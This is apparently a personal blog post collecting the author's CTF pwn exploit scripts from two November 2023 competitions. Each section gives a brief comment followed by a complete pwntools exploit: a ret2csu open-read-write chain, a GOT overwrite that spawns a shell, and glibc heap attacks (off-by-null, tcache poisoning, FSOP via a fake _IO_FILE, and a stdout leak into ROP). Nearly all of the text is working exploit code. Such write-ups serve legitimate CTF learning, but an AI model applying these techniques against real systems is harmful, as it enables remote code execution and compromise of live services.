11月比赛合集

本文最后更新于:2023年12月7日 晚上

鹏城杯

甲级战犯第一场

silent

用一个magic gadget + ret2csu直接打

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
from pwn import *
import sys


context.log_level='debug'
context.arch='amd64'

libc = ELF('./libc.so.6')
elf = ELF('./silent')
flag = 1
if flag:
    p = remote('172.10.0.8', 9999)
else:
    p = process("silent")
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
leak = lambda name,addr :log.success(name+"--->"+hex(addr))

ret2csu_front = 0x0000000000400940
ret2csu_behind = 0x000000000040095A
magic_gadget = 0x00000000004007e8
stdout_got = 0x601020
bss = 0x602000

#0x00000000004007e8 : add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
def set_offset(target,raw):
    offset = target - raw
    if offset < 0:
        offset = offset + 0x100000000
    return offset

def set_vuln(offset,target):
    payload = flat([
        ret2csu_behind,
        offset,
        target+0x3d,
        0,0,0,0,
        magic_gadget,
    ])
    return payload


def ret2csu(rdi,rsi,rdx,vuln):
    payload = flat([
        ret2csu_behind,
        0,1,
        vuln,
        rdi,rsi,rdx,
        ret2csu_front,
        0,0,0,0,0,0,0,
    ])
    return payload

payload1 = b'a'*0x48 + ret2csu(0,bss,0x300,elf.got['read']) + p64(0x400878)

sd(payload1.ljust(0x100,b'\x00'))

payload2 = b'./flag\x00\x00' + set_vuln(set_offset(libc.sym['open'],libc.sym['_IO_2_1_stdout_']),stdout_got)
payload2 += ret2csu(bss,0,0,stdout_got)
payload2 += ret2csu(3,bss+0x500,0x40,elf.got['read'])
payload2 += set_vuln(set_offset(libc.sym['write'],libc.sym['open']),stdout_got)
payload2 += ret2csu(1,bss+0x500,0x40,stdout_got)
payload2 = payload2.ljust(0x300,b'\x00')
sd(payload2)

payload3 = b'a'*0x40 + p64(bss) + p64(0x0000000000400876)
sd(payload3.ljust(0x100,b'\x00'))
p.interactive()

auto coffee

能直接覆写第二个指针组的,sb了我淦

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
from pwn import *
import sys


context.log_level='debug'
context.arch='amd64'

libc = ELF('./libc-2.31.so')
# elf = ELF('./challenge')
flag = 0
if flag:
    p = remote('43.132.193.22', 9998)
else:
    p = process("./coffee")
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
leak = lambda name,addr :log.success(name+"--->"+hex(addr))

def login():
    sla(b'>>>',b'4421')
    sl(b'just pwn it')

def out():
    sla(b'>>>',b'3')

def buy1(choice):
    sla(b'>>>',b'1')
    sla(b'buy\n',str(choice).encode())
    sla(b'N\n',b'N')

def buy2(choice,content):
    sla(b'>>>',b'1')
    sla(b'buy\n',str(choice).encode())
    sla(b'N\n',b'Y')
    sa(b'\n',content)

def re_coffee(choice):
    sla(b'>>>',b'1')
    sla(b'>>>',str(choice).encode())

def edit(choice,idx,content):
    sla(b'>>>',b'2')
    sla(b'>>>',str(choice).encode())
    sla(b'>>>',str(idx).encode())
    sa(b'\n',content)

buy1(1)
login()
edit(1,1,p64(0))
out()

buy1(2)
login()
edit(2,1,p64(0))
out()

buy1(1)
login()
edit(1,1,p64(0))
out()

buy1(2)
login()
edit(2,1,p64(0))
out()

buy1(1)
login()
edit(1,1,p64(0))
out()

buy1(2)
login()
edit(2,1,p64(0))
out()

buy1(1)
login()
edit(1,1,p64(0x4063c0))
out()

for i in range(7):
    buy1(3)

login()
re_coffee(3)
re_coffee(3)
edit(3,2,p64(0x406300)+p64(0x4062f0)+p64(0x406018))

edit(1,2,p64(0x406000))
sla(b'>>>',b'2')
ru(b'3.')
libc.address = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00')) - libc.sym['read']
leak("libc.address",libc.address)

sla(b'>>>',b'1')
sla(b'>>>',b'3')
sa(b'\n',p64(libc.sym['system']))
out()

buy2(1,b'/bin/sh\x00')

p.interactive()

babyheap

2.38的off by null(你惦记你那逼unlink干啥呢)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
from pwn import *
import sys

context.log_level='debug'
context.arch='amd64'

libc = ELF('./libc.so.6')
# elf = ELF('./challenge')
flag = 0
if flag:
    p = remote('43.132.193.22', 9998)
else:
    p = process("babyheap")
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
leak = lambda name,addr :log.success(name+"--->"+hex(addr))

menu = b'>> \n'

def add(size,content):
    sla(menu,b'1')
    sla(b'\n',str(size).encode())
    sa(b'\n',content)

def edit(index,size,content):
    sla(menu,b'2')
    sla(b'\n',str(index).encode())
    sla(b'\n',str(size).encode())
    sa(b'\n',content)

def show(index):
    sla(menu,b'3')
    sla(b'\n',str(index).encode())

def delete(index):
    sla(menu,b'4')
    sla(b'\n',str(index).encode())

ru(b'0x')
heap = int(rc(12),16) - 0x2a0
leak("heap_base",heap)

add(0x4f8,b"\n")
add(0x4f8,b"\n")
add(0x408,b"\n")

edit(0,0x4f8,p64(heap+0x7b0)+p64(heap+0x7b0)+b"\x00"*0x4e0+p64(0x500))
edit(1,0x10,p64(heap+0x2b0)+p64(heap+0x2b0))

delete(1)

add(0x408,b'\n')#1
delete(2)
delete(0)

edit(1,0x8,p64((heap>>12)^(heap+0xae0)))
add(0x408,b"\n")
add(0x408,b"\n")

add(0x408,b"\n")
add(0x408,b"\n")
show(2)

libc.address = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00')) - 0x1feed0
leak("libc",libc.address)

delete(4)
delete(0)
edit(1,0x8,p64((libc.sym['_IO_list_all']^(heap>>12))))

fake_io_addr = heap + 0x2c0
fake_IO_struct = b'  sh;\x00\x00\x00'   #rdi
fake_IO_struct += p64(0)*0x4
fake_IO_struct += p64(1)
fake_IO_struct = fake_IO_struct.ljust(0x88,b'\x00') + p64(heap + 0x800)
fake_IO_struct = fake_IO_struct.ljust(0xa0,b'\x00')
fake_IO_struct += p64(fake_io_addr + 0x200) #fake_wide_addr
fake_IO_struct = fake_IO_struct.ljust(0xd8,b'\x00')
fake_IO_struct += p64(libc.sym['_IO_wfile_jumps'])
fake_IO_struct = fake_IO_struct.ljust(0x200,b'\x00')
fake_IO_struct += b'\x00'*0xe0
fake_IO_struct += p64(fake_io_addr + 0x200 + 0xe0)
fake_IO_struct += b'\x00'*0x60 + p64(libc.sym['system'])  #system/setcontext

add(0x408,fake_IO_struct+b'\n')
add(0x408,p64(heap+0x2c0)[0:6]+b'\n')
gdb.attach(p)
sla(menu,b'5')

p.interactive()

强网拟态

甲级战犯第二场

noob_heap

玩个🐕8堆风水,🧠要坏掉了

off by null 和malloc_consolidate的利用点是一眼就看出来了,然后👴风水做法做了四个小时实在扛不住了耻辱下班md

后来看了星盟的exp后恍然大悟。malloc_consolidate终归还是不是很熟悉,哎。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
from pwn import *
import sys


context.log_level='debug'
context.arch='amd64'

libc = ELF('./libc.so.6')
# elf = ELF('./challenge')

flag = 0
if flag:
    p = remote('43.132.193.22', 9998)
else:
    p = process("./noob_heap")
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
leak = lambda name,addr :log.success(name+"--->"+hex(addr))

menu = b'>> '
def add(size):
    sla(menu,b'1')
    sla(b': ',str(size).encode())

def edit(index,content):
    sla(menu,b'3')
    sla(b': ',str(index).encode())
    sa(b': ',content)

def delete(index):
    sla(menu,b'2')
    sla(b': ',str(index).encode())

def show(index):
    sla(menu,b'4')
    sla(b': ',str(index).encode())

add(0x78)
delete(0)
add(0x78)
show(0)
heap_base = u64(p.recvuntil(b'\n',drop=True)[-5:].ljust(8,b'\x00')) << 12
leak("heap_base",heap_base)

for i in range(6):
    add(0x78)  #1-6

for i in range(18):
    add(0x78)  #7-24

for i in range(7):
    delete(i)

for i in range(9):
    delete(i+7)
sla(menu,b'1'*0x400)

for i in range(7):
    add(0x78) #0-6

add(0x78)  #7
show(7)
libc.address = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00')) - 0x21a0f0
leak("libc",libc.address)

for i in range(6):
    add(0x78)

for i in range(7):
    delete(i)

edit(13,p64(heap_base+0x910)*2 + b'\x00'*0x60 + p64(0x80))
delete(12)
delete(11)
sla(menu,b'1'*0x400)


edit(10, p64((heap_base + 0x790))*2 + b'\x00'*0x60 + p64(0x80))
delete(9)
sla(menu,b'1'*0x400)

for i in range(7):
    add(0x78)

add(0x78)
add(0x78)
add(0x78)
add(0x78)

for i in range(4):
    delete(i)

delete(10)
edit(14,p64(libc.sym['_IO_2_1_stdout_']^(heap_base>>12))[0:6])
add(0x78)
add(0x78)
edit(1,p64(0xfbad1800) + p64(0)*3 + p64(libc.sym['_environ']) + p64(libc.sym['_environ']+8))

stack = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00'))
ret_addr = stack - 0x138 - 0x60

delete(0)

edit(14,p64(ret_addr^(heap_base>>12))[0:6])

leak("stack",stack)
add(0x78)
add(0x78)

pop_rdi = 0x000000000002a3e5 + libc.address
pop_rsi = 0x0000000000160498 + libc.address
pop_rdx = 0x00000000000796a2 + libc.address
lea_ret = 0x000000000004da83 + libc.address
orw = flat([
    pop_rdi,ret_addr,
    pop_rsi,0,
    libc.sym['open'],
    pop_rdi,3,
    pop_rsi,heap_base+0x300,
    pop_rdx,0x40,
    libc.sym['read'],
    pop_rdi,1,
    libc.sym['write'],
])
edit(0,orw)

edit(2,b'./flag\x00\x00' + p64(0)*6 + p64(lea_ret) + p64(0)*4 + p64(heap_base+0x7a0-8) + p64(lea_ret))

p.interactive()
CtfMatch
#CTF、Pwn
11月比赛合集
http://example.com/2023/11/02/11/
作者
korey0sh1
发布于
2023年11月2日
许可协议